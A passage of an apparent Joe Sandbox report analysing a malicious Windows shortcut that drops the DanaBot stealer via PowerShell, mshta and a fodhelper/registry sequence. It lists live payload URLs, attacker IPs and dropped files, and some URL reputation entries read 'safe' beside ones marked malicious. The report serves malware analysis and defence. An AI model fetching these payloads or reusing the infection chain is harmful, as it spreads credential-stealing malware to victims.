          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mama.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 46_2_03525920 GetVersionExW,GetVersionExW,LoadLibraryW,46_2_03525920
          Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected DanaBot stealer dll
          Source: Yara matchFile source: 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 1532, type: MEMORYSTR
          Source: Yara matchFile source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 1532, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected DanaBot stealer dll
          Source: Yara matchFile source: 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 1532, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		1
          Scripting          		12
          Process Injection          		11
          Masquerading          		OS Credential Dumping211
          Security Software Discovery          		Remote Services1
          Email Collection          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts12
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Modify Registry          		LSASS Memory12
          Process Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Native API          		Logon Script (Windows)Logon Script (Windows)131
          Virtualization/Sandbox Evasion          		Security Account Manager131
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive1
          Multi-hop Proxy          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell          		Login HookLogin Hook12
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets3
          File and Directory Discovery          		SSHKeylogging13
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials165
          System Information Discovery          		VNCGUI Input Capture1
          Proxy          		Data Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581248 Sample: A4FY1OA97K.lnk Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 87 pravo-bashkortostan.ru 2->87 89 x1.i.lencr.org 2->89 91 bg.microsoft.map.fastly.net 2->91 101 Suricata IDS alerts for network traffic 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 Windows shortcut file (LNK) starts blacklisted processes 2->105 107 9 other signatures 2->107 15 ssh.exe 2 2->15         started        18 svchost.exe 1 1 2->18         started        signatures3 process4 dnsIp5 125 Windows shortcut file (LNK) starts blacklisted processes 15->125 21 powershell.exe 7 15->21         started        24 conhost.exe 1 15->24         started        93 127.0.0.1 unknown unknown 18->93 signatures6 process7 signatures8 109 Windows shortcut file (LNK) starts blacklisted processes 21->109 111 Powershell drops PE file 21->111 26 powershell.exe 7 21->26         started        process9 signatures10 115 Windows shortcut file (LNK) starts blacklisted processes 26->115 29 mshta.exe 16 26->29         started        process11 dnsIp12 95 pravo-bashkortostan.ru 150.241.97.10, 443, 49699, 49719 TECNALIAES Spain 29->95 119 Windows shortcut file (LNK) starts blacklisted processes 29->119 121 Suspicious powershell command line found 29->121 33 powershell.exe 16 20 29->33         started        signatures13 process14 file15 83 C:\Users\user\AppData\Roaming\mama.exe, PE32 33->83 dropped 85 C:\Users\user\AppData\Local\Temp\r.bat, ASCII 33->85 dropped 99 Windows shortcut file (LNK) starts blacklisted processes 33->99 37 cmd.exe 33->37         started        40 cmd.exe 1 33->40         started        42 cmd.exe 33->42         started        44 3 other processes 33->44 signatures16 process17 signatures18 113 Uses cmd line tools excessively to alter registry or file data 37->113 46 fodhelper.exe 37->46         started        61 2 other processes 37->61 49 fodhelper.exe 3 12 40->49         started        51 reg.exe 1 1 40->51         started        53 reg.exe 1 1 40->53         started        55 reg.exe 42->55         started        57 reg.exe 42->57         started        59 AcroCEF.exe 44->59         started        63 2 other processes 44->63 process19 signatures20 123 Windows shortcut file (LNK) starts blacklisted processes 46->123 65 cmd.exe 46->65         started        68 cmd.exe 1 49->68         started        70 AcroCEF.exe 59->70         started        process21 signatures22 97 Windows shortcut file (LNK) starts blacklisted processes 65->97 72 cmd.exe 65->72         started        74 conhost.exe 65->74         started        76 cmd.exe 1 68->76         started        79 conhost.exe 68->79         started        process23 signatures24 117 Windows shortcut file (LNK) starts blacklisted processes 76->117 81 conhost.exe 76->81         started        process25

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          A4FY1OA97K.lnk42%VirustotalBrowse
          A4FY1OA97K.lnk34%ReversingLabsShortcut.Trojan.Pantera
          A4FY1OA97K.lnk100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\mama.exe100%AviraTR/ATRAPS.Gen
          C:\Users\user\AppData\Roaming\mama.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\mama.exe71%ReversingLabsWin32.Trojan.Danabot

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://150.241.97.10/aaa.mp4zL0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4;0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4https://150.241.97.10/aaa.mp40%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/mama.exeu0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4E0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/ggg.pdfp0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4$global:?0%Avira URL Cloudsafe
          http://www.aiim.org/pdfua/ns/id/0%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/ggg.pdf0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4H0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4ndow0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4-1-00%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4m32;C:0%Avira URL Cloudsafe
          https://150.241.0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4PCU0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4lePa0%Avira URL Cloudsafe
          https://150.2410%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru0%Avira URL Cloudsafe
          https://150.241.X0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4...0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4...X7o(0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp46)g0%Avira URL Cloudsafe
          https://150.241.97.10/0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp41-00%Avira URL Cloudsafe
          https://pravo-bashkortostan.ru/mama.exe0%Avira URL Cloudsafe
          http://pravo-bashkortostan.ru0%Avira URL Cloudsafe
          https://150.241.97.10/L0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4C:0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4cL0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4U0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp40%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4p0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4g0%Avira URL Cloudsafe
          https://150.241.97.10/aaa.mp4l0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          bg.microsoft.map.fastly.net
          		199.232.214.172
          		truefalse
            		high
            pravo-bashkortostan.ru
            		150.241.97.10
            		truetrue
              		unknown
              x1.i.lencr.org
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://pravo-bashkortostan.ru/ggg.pdftrue
                • Avira URL Cloud: safe
                		unknown
                https://pravo-bashkortostan.ru/mama.exetrue
                • Avira URL Cloud: safe
                		unknown
                https://150.241.97.10/aaa.mp4true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://html4/loose.dtdmama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpfalse
                  		high
                  http://crl.microsoftpowershell.exe, 00000010.00000002.1588516515.000001A5A25A4000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.aiim.org/pdfua/ns/id/powershell.exe, 00000010.00000002.1589229169.000001A5A4876000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1589229169.000001A5A487A000.00000004.00000800.00020000.00000000.sdmp, ggg.pdf.16.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.openssl.org/Vmama.exe, 0000002E.00000003.1690353653.000000007EB44000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2563240393.0000000063469000.00000040.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000003.1694358130.000000007EB1A000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2569666580.000000006E66F000.00000040.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://150.241.97.10/aaa.mp4;mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D754000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://150.241.97.10/aaa.mp4$global:?powershell.exefalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://150.241.97.10/aaa.mp4https://150.241.97.10/aaa.mp4mshta.exe, 00000009.00000003.1683955749.0000020454955000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://pravo-bashkortostan.ru/mama.exeupowershell.exe, 00000010.00000002.1589229169.000001A5A48B4000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://150.241.97.10/aaa.mp4zLmshta.exe, 00000009.00000002.1695362199.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1682520730.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671976829.000001FC4D71C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://.cssmama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://150.241.97.10/aaa.mp4Hmshta.exe, 00000009.00000002.1695212616.000001FC4D6D0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://pravo-bashkortostan.ru/ggg.pdfppowershell.exe, 00000010.00000002.1589229169.000001A5A6159000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.openssl.org/support/faq.htmlmama.exe, 0000002E.00000003.1686533441.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2563240393.0000000063281000.00000040.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://150.241.97.10/aaa.mp4Emshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://150.241powershell.exe, 00000008.00000002.1314828772.0000026DEE53A000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://pravo-bashkortostan.rupowershell.exe, 00000010.00000002.1589229169.000001A5A6159000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://150.241.powershell.exe, 00000008.00000002.1303793808.0000026DD6766000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1303793808.0000026DD67C1000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://150.241.97.10/aaa.mp4ndowmshta.exe, 00000009.00000002.1696165749.000001FC4D970000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://150.241.97.10/aaa.mp4-1-0mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1303793808.0000026DD62D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1589229169.000001A5A43C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://.jpgmama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://150.241.97.10/aaa.mp4...mshta.exe, 00000009.00000002.1700961304.0000020450300000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.34.drfalse
                                        		high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://150.241.97.10/aaa.mp4PCUpowershell.exe, 00000008.00000002.1301938072.0000026DD4568000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://150.241.97.10/aaa.mp4lePapowershell.exe, 00000008.00000002.1301938072.0000026DD4568000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://go.micropowershell.exe, 00000010.00000002.1589229169.000001A5A5433000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000E.00000003.1310921737.000001FA6F670000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.14.dr, edb.log.14.drfalse
                                                  		high
                                                  http://crl.ver)svchost.exe, 0000000E.00000002.2534641248.000001FA6F88C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://150.241.97.10/aaa.mp4m32;C:powershell.exe, 00000008.00000002.1303247475.0000026DD47D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://150.241.Xpowershell.exe, 00000008.00000002.1303793808.0000026DD6766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://150.241.97.10/mshta.exe, 00000009.00000002.1695531974.000001FC4D776000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671405780.000001FC4D774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://150.241.97.10/aaa.mp4C:mshta.exe, 00000009.00000002.1695655072.000001FC4D7B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1669958089.000001FC4D7B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://pravo-bashkortostan.rupowershell.exe, 00000010.00000002.1589229169.000001A5A62CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.adobe.coReaderMessages.33.drfalse
                                                        		high
                                                        https://g.live.com/odclientsettings/Prod1C:edb.log.14.drfalse
                                                          		high
                                                          http://www.openssl.org/support/faq.htmlRANDmama.exe, 0000002E.00000003.1686533441.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2563240393.0000000063281000.00000040.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://150.241.97.10/aaa.mp41-0mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://150.241.97.10/aaa.mp46)gmshta.exe, 00000009.00000003.1670028016.000001FC4D729000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D72A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://150.241.97.10/aaa.mp4...X7o(mshta.exe, 00000009.00000003.1670473228.0000020450342000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1687261023.0000020450359000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1701291403.000002045035B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://150.241.97.10/aaa.mp4cLmshta.exe, 00000009.00000002.1695362199.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1682520730.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671976829.000001FC4D71C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://150.241.97.10/Lmshta.exe, 00000009.00000002.1695531974.000001FC4D776000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671405780.000001FC4D774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://150.241.97.10/aaa.mp4Upowershell.exe, 00000008.00000002.1314419679.0000026DEE47C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://150.241.97.10/aaa.mp4ppowershell.exe, 00000008.00000002.1303793808.0000026DD62C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://aka.ms/pscore68powershell.exe, 00000008.00000002.1303793808.0000026DD6320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1303793808.0000026DD630D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1589229169.000001A5A43C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://150.241.97.10/aaa.mp4lmshta.exe, 00000009.00000003.1670028016.000001FC4D729000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D72A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://150.241.97.10/aaa.mp4gmshta.exe, 00000009.00000002.1695254221.000001FC4D706000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              188.132.183.159
                                                              		unknownTurkey
                                                              		42910PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRtrue
                                                              206.206.125.221
                                                              		unknownUnited States
                                                              		13332HYPEENT-SJUStrue
                                                              94.131.118.216
                                                              		unknownUkraine
                                                              		29632NASSIST-ASGItrue
                                                              150.241.97.10
                                                              		pravo-bashkortostan.ruSpain
                                                              		207714TECNALIAEStrue

                                                              Private

                                                              IP
                                                              127.0.0.1

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1581248
                                                              Start date and time:2024-12-27 09:04:10 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 8m 7s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:56
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
